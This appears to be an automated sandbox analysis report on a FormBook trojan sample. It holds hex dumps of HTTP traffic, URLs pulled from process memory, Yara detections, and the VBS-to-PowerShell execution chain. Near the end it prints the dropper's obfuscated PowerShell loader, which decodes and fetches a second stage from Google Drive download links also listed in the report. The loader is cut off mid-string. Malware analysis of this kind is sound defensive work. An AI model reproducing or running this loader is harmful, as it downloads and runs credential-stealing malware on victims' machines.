72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 16 Sep 2024 12:46:49 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
          Source: powershell.exe, 00000001.00000002.2302097105.000001F2A0F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
          Source: powershell.exe, 00000001.00000002.2302097105.000001F2A0DC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A11E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
          Source: powershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2216604183.00000000048F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000006.00000002.2221760380.00000000075A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000006.00000002.2216604183.00000000048F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: powershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000001.00000002.2302097105.000001F2A089A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F5CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A089A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
          Source: wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/C
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qnP
          Source: powershell.exe, 00000006.00000002.2216604183.0000000004A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qnXR
          Source: wabmig.exe, 0000000A.00000003.2332992971.0000000005E59000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E59000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434603463.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2332669615.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434620654.0000000005E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV
          Source: wabmig.exe, 0000000A.00000002.2434620654.0000000005E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV1
          Source: powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh:
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A11E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
          Source: wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/$
          Source: wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/P
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F6B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A11E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn&export=download
          Source: wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV&export=download
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29FCEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: ktmutil.exe, 0000000C.00000003.2612364747.0000000007652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
          Source: powershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: powershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49740 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Potential malicious VBS script found (suspicious strings)
          Source: Initial file: Call Bankerstatning.ShellExecute(Skulpturere, Brislens149, "", "", Krltoppene)
          Very long command line found
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5192
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5227
          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5193
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5192Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5227Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5193Jump to behavior
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModc
